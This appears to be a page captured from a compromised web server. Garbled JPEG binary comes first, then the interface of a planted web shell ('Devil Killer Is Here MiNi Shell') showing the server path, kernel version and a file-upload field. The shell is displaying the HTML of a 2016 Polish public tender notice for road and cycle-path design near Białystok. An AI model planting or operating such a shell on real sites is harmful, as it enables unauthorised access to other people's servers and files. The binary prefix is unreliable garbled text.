JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160302/21679-N-2016.html

<p class="kh_header"><b>Białystok: Opracowanie dokumentacji projektowej na:
  Zadanie I. - Przebudowę z rozbudową skrzyżowania drogi powiatowej Nr 1377 B z drogami    gminnymi Nr 105501 B i Nr 105509 w m. Łopuchowo (Gmina Tykocin)
  Zadanie II. - Przebudowę drogi powiatowej Nr 1552 B - ulica  Dominikańska  w Choroszczy
Zadanie III. - Budowę ścieżki rowerowej wzdłuż drogi powiatowej Nr 1483 B na odcinku Juchnowiec Kościelny - Wólka (Gm. Juchnowiec Kościelny)</b><br>
<b>Numer ogłoszenia: 21679 - 2016; data zamieszczenia: 02.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Białymstoku , Zaścianki, Szosa Baranowicka 37, 15-522 Białystok, woj. podlaskie, tel. (085) 740-21-49, 740-22-17, faks (085) 740-22-19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzd.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na:
  Zadanie I. - Przebudowę z rozbudową skrzyżowania drogi powiatowej Nr 1377 B z drogami    gminnymi Nr 105501 B i Nr 105509 w m. Łopuchowo (Gmina Tykocin)
  Zadanie II. - Przebudowę drogi powiatowej Nr 1552 B - ulica  Dominikańska  w Choroszczy
Zadanie III. - Budowę ścieżki rowerowej wzdłuż drogi powiatowej Nr 1483 B na odcinku Juchnowiec Kościelny - Wólka (Gm. Juchnowiec Kościelny).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej na:
  Zadanie I. - Przebudowę z rozbudową skrzyżowania drogi powiatowej Nr 1377 B z drogami    gminnymi Nr 105501 B i Nr 105509 w m. Łopuchowo (Gmina Tykocin) 
  Zadanie II. - Przebudowę drogi powiatowej Nr 1552 B - ulica  Dominikańska  w Choroszczy
Zadanie III. - Budowę ścieżki rowerowej wzdłuż drogi powiatowej Nr 1483 B na odcinku Juchnowiec Kościelny - Wólka (Gm. Juchnowiec Kościelny).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem, w wykonaniu (zakończeniu) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: Wykonawca musi wykazać się doświadczeniem, w wykonaniu (zakończeniu) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 
Dla zadań I i II - 2 dokumentacji projektowych odpowiadających swoim rodzajem przedmiotowi zamówienia tj. każda dokumentacja dotyczące projektu budowy lub przebudowy drogi/ulicy o długości min. 300,00 m wraz z kanalizacja deszczową długości min. 50 m dla których uzyskano pozwolenie na budowę
Dla zadania III - 2 dokumentacji projektowych odpowiadających swoim rodzajem przedmiotowi zamówienia tj. każda dokumentacja dotyczące projektu budowy lub przebudowy drogi/ulicy o długości min. 500,00 m i jednego projektu budowy lub przebudowy przepustu o średnicy min. 0,8 m , dla którego uzyskano pozwolenie na budowę</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymującymi się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednimi do funkcji, jakie zostaną im powierzone. Wykonawca  przedstawi  wraz z ofertą osoby,  które spełniają następujące wymagania:
Dla zadania I, 
1)	min.  jedna osoba proponowana do pełnienia funkcji projektanta posiadająca minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie :
-  projektant powinien posiadać  uprawnienia  projektowe w specjalności drogi  (bez ograniczeń) lub im  równoważne.  
-  projektant powinien zrealizować min.2 dokumentacje projektowe dotyczące projektu  budowy lub przebudowy drogi/ulicy o  długości  min. 300,00 m dla których uzyskano pozwolenie na budowę , dla których uzyskano pozwolenie na budowę 
2)	min jedna osoba proponowana do pełnienia funkcji projektanta posiadająca minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie
- projektant powinien posiadać  uprawnienia projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych , wentylacyjnych, gazowych ,wodociągowych i kanalizacyjnych (bez ograniczeń ) lub im równoważne i opracować min. 1 dokumentację projektowa dotycząca projektu budowy lub przebudowy kanalizacji deszczowej o dług. min. 50 m. dla której uzyskano pozwolenie na budowę 
3) min.  jedna osoba proponowana do pełnienia funkcji projektanta posiadająca
minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie :
-  projektant powinien posiadać  uprawnienia  projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  lub  im  równoważne.  
Dla zadania II, 
1)	min.  jedna osoba proponowana do pełnienia funkcji projektanta posiadająca minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie :
-  projektant powinien posiadać  uprawnienia  projektowe w specjalności drogi  (bez ograniczeń) lub im  równoważne.  
 -  projektant powinien zrealizować min.2 dokumentacje projektowe dotyczące projektu budowy lub przebudowy drogi/ulicy o  długości  min. 300,00 m dla których uzyskano pozwolenie na budowę , dla których uzyskano pozwolenie na budowę 
2)	min jedna osoba proponowana do pełnienia funkcji projektanta posiadająca minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie
- projektant powinien posiadać  uprawnienia projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych , wentylacyjnych, gazowych , wodociągowych i kanalizacyjnych (bez ograniczeń ) lub im równoważne i opracować min. 1 dokumentację projektowa dotycząca projektu budowy lub przebudowy kanalizacji deszczowej o dług. min. 50 m. dla której uzyskano pozwolenie na budowę 
Dla zadania III
1)	min.  jedna osoba proponowana do pełnienia funkcji projektanta posiadająca minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie :
-  projektant powinien posiadać  uprawnienia  projektowe w specjalności drogi  (bez  ograniczeń) lub im  równoważne.  
-  projektant powinien zrealizować min.2 dokumentacje projektowe dotyczące projektu budowy lub przebudowy drogi/ulicy o  długości  min. 500,00 m i jednego projektu budowy lub   przebudowy przepustu o średnicy min. 0,8 m , dla których uzyskano pozwolenie na budowę</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykazać usługi na potwierdzenie spełnienia warunku doświadczenia;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożnością dotrzymania terminów określonych w formularzu cenowym, termin ten może ulec przedłużeniu, nie więcej jednak, niż o czas trwania tych okoliczności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzd.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego, pokój nr 17 lub za pośrednictwem poczty lub na w/p stronie internetowej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2016 godzina 09:50, miejsce: Siedziba Zamawiającego pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dokumentacja projektowa na: Przebudowę z rozbudową skrzyżowania drogi powiatowej Nr 1377 B 
z drogami gminnymi Nr 105501 B i Nr 105509 w m. Łopuchowo (Gmina Tykocin).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stan istniejący (dane ewidencyjne podlegające weryfikacji przez Projektanta)
1.1.	Szerokość istniejącej jezdni i korona 
Droga powiatowa Nr 1377 B: Tykocin - Kiermusy - Nieciece - Łopuchowo - Zawady przebudowa w obrębie skrzyżowania w m. Łopuchowo na odcinku ok. 140m, 
- jezdnia  szer.  5,0m i 3,5m; przekrój półuliczny i szlakowy
- szerokość w liniach rozgraniczających  - 9,0m i 12,0m
Droga gminna Nr 105501 B;  przebudowa na odcinku o dług. ok. 60m.
- jezdnia  szer.  5,5m, przekrój szlakowy 
- szerokość w liniach rozgraniczających - 12,0m,  
Droga gminna Nr 105509 B;  przebudowa na odcinku o dług. ok. 60m.
- jezdnia  szer.  5,0m, przekrój półuliczny 
- szerokość w liniach rozgraniczających - 9,0m,  

1.2.	Rodzaj i stan istniejącej jezdni wykorzystywanej jako podbudowa
Istniejącą jezdnię należy przewidzieć do rozbiórki. 

1.3.	Obiekty inżynierskie
- dwa przepusty żelbetowe, korytkowe - do rozbiórki
 
1.4.	Niweleta drogi
Niweleta drogi wymaga ukształtowania

1.5.	Stan rowów  - do renowacji
        
1.6.	Urządzenia obce w pasie drogowym
- linia energetyczna napowietrzna i doziemna
- linia telefoniczna kablowa i napowietrzna
- sieć wodociągowa i przyłącza wodociągowe

2.	DANE WYJŚCIOWE DO PROJEKTOWANIA
2.1.	Parametry techniczne do projektowania:
2.1.1. Prędkość projektowa Vp   -  40 lub 30 km/h - teren zabudowany
2.1.2. Kategoria drogi                  -   L
2.1.3. Przekrój poprzeczny (normalny):
-	uliczny, 

2.2.	  Konstrukcja (technologia) nawierzchni
2.2.1.Kategoria ruchu - należy określić na podstawie prognozy ruchu w 10 roku eksploatacji przyjmując  
                                      2016 rok za rok wyjściowy i dane z przeprowadzonych pomiarów ruchu.
2.2.2.Podbudowa - kruszywowa; 
2.2.3.Nawierzchnia - beton asfaltowy  
 
2.3.	Propozycje dotyczące odwodnienia i bezpieczeństwa ruchu
Skrzyżowanie drogi powiatowej Nr 1377 B z drogami gminnymi Nr 105501 B i Nr 105509 skanalizowane w postaci małego ronda (przejazdowe). Oświetlenie ronda. Odwodnienie drogi wymaga budowy odcinka sieci kanalizacji deszczowej.
2.5.   Propozycje dotyczące zadrzewienia
Przewidzieć do wycinki wszystkie drzewa zagrażające bezpieczeństwu ruchu i uniemożliwiające wykonanie przebudowy drogi.
Drzewa przewidziane do wycinki należy ponumerować na mapie syt-wys.
Przewidzieć do wycinki zbędne zakrzaczenie, a istniejące karcze do wykarczowania

2.4.	Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
Nie przewiduje się przebudowy uzbrojenia terenu. W przypadku stwierdzenia kolizji, w porozumieniu z 
Zamawiającym ustalić zakres przełożenia urządzeń obcych oraz formę zapłaty za opracowanie branżowe.

3.    ZAKRES OPRACOWANIA
3.1. Opracować wszystkie niezbędne materiały i uzyskać wszystkie uzgodnienia do pozwolenia na bu-dowę. Zamawiający przewiduje uzyskanie zgody na realizację inwestycji drogowej w ramach  
Specustawy drogowej. Projekt wykonać na aktualnej mapie do celów projektowych. Tytuł projektu budowlanego uzgodnić z Zamawiającym.
Prawidłowe wykonanie mapy obejmuje następujące czynności:
-  	porównanie istniejącej mapy z terenem i naniesienie na nią istniejących i projektowanych elementów infrastruktury technicznej oraz obiektów inżynierskich w tym rowów przydrożnych,
- 		obliczenie współrzędnych punktów granicznych do wkartowania na mapę pasa drogowego
-  	wykonanie pomiarów aktualizacyjnych (sytuacyjno - wysokościowych)
-  	opracowanie mapy sytuacyjno - wysokościowej w skali 1:500
- 	rejestracja opracowania w Powiatowym Ośrodku Dokumentacji Geodezyjno - Kartograficznej w Białymstoku.
Zamawiający wymaga, aby do mapy do celów projektowych były dołączone dokumenty dotyczące lokalizacji i rzędnych reperów państwowych/roboczych, w odniesieniu do których określono rzędne wykazane na mapie oraz układu odniesienia.
       
 3.2. Dodatkowo należy opracować:
       -     operat wodnoprawny -  odprowadzenie wód opadowych do ziemi,  wylot odcinkowej sieci 
    kanalizacji deszczowej, uzgodnione w WZMiUW w Białymstoku ul. Handlowa 6.
      -      badania geotechniczne podłoża nawierzchni - min. po 2 otwory badawcze w istniejącej jezdni 
             dróg, na każdym wlocie,
       -     pomiary ruchu i prognozę ruchu na 20 lat
-	projekt stałej organizacji ruchu (oznakowanie pionowe i poziome), 
-	oświetlenie ronda

Dokumentację należy przekazać:
             1. Materiały do opiniowania ze Specustawy drogowej 
                wraz z naniesionymi na mapę projektowanymi 
               podziałami działek                                                                                        - 6 egz.
            2. mapa do celów projektowych w skali 1:500                                                 - 1 egz.
3. Projekt budowlany                                                                                       - 4 egz.
      4. Projekt wykonawczy (techniczny) branża drogowa 
          z częścią przedmiarową i ST                                                                       - 5 egz. 
      5.  Projekt wykonawczy (techniczny) branża sanitarna
           (kanalizacja deszczowa) z częścią przedmiarową i ST                              - 5 egz.            
      6. Projekt wykonawczy (techniczny) branża elektroenergetyczna (oświetlenie ronda)
           z częścią przedmiarową i ST                                                                      - 5 egz.
      7. Operat wodnoprawny (odprowadzenie wód opadowych do wód 
          lub do ziemi) wersja papierowa   - 3egz. + wersja elektroniczna - po 2 płytki
8. Badania geotechniczne podłoża nawierzchni                        	                - 2 egz. 
9. Plan wyrębu drzew i krzewów                                                                      - 3 egz.
10.  Projekt stałej organizacji ruchu                                                                     - 4 egz.    
 
             Obowiązuje wersja elektroniczna całej dokumentacji projektowej  - 1 płyta

Pozostałe Wymagania w stosunku do dokumentacji projektowej podano w Rozdziale 6.
Obowiązuje przedstawienie do dnia 22.04.2016r. koncepcji zagospodarowania terenu w wersji papierowej, do której Zamawiający ustosunkuje się w ciągu pięciu dni roboczych. Koncepcja może być opracowana na mapach zasadniczych dostępnych w Powiatowym Ośrodku Dokumentacji geodezyjnej i Kartograficznej w Białymstoku, Białystok ul. Mickiewicza 3

Obowiązuje przedstawienie do dnia 16.05.2016r. koncepcji w wersji papierowej zawierającej rozwiązania sytu-acyjne i wysokościowe (zagospodarowanie terenu, profil podłużny z projektowaną niweletą, przekroje normalne, wybrane przekroje poprzeczne, zdefiniowane kolizje z urządzeniami obcymi dla drogi),  do której Zamawiający ustosunkuje się w ciągu pięciu dni roboczych. 

3.3. Terminy przekazania Zamawiającemu elementów zamówienia zostały określone w formularzu cenowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dokumentacja projektowa na: Przebudowę drogi powiatowej Nr 1552 B - ulica  Dominikańska  w 
Choroszczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stan istniejący
1.1	Szerokość istniejącej jezdni i korona
Początek opracowania km rob. 0+000 należy założyć na skrzyżowaniu ul. Dominikańskiej i ul. Rynek. 
Koniec opracowania  -  km rob. ok. 0+380  
- jezdnia ulicy z m.m.a., szer. jezdni 7,0m, przekrój uliczny.
1.2	Rodzaj i stan istniejącej jezdni wykorzystywanej jako podbudowa
Przewidzieć nową konstrukcję jezdni; destrukt bitumiczny przewidzieć do wykorzystania, po przekruszeniu, na doziarnienie kruszywa na podbudowę.
1.3	Sytuacja trasy
Ulica zagospodarowana - nie przewiduje się drastycznych korekt przebiegu trasy.
1.4	Niweleta drogi
Niweleta drogi wymaga korekt.
1.5	Stan rowów i innych urządzeń odwadniających.
Ulica wyposażona w sieć kanalizacji deszczowej - stan niezadowalający.    
1.6	Urządzenia obce w pasie drogowym
     - gazociąg wraz z przyłączami, 
- wodociąg wraz z przyłączami,
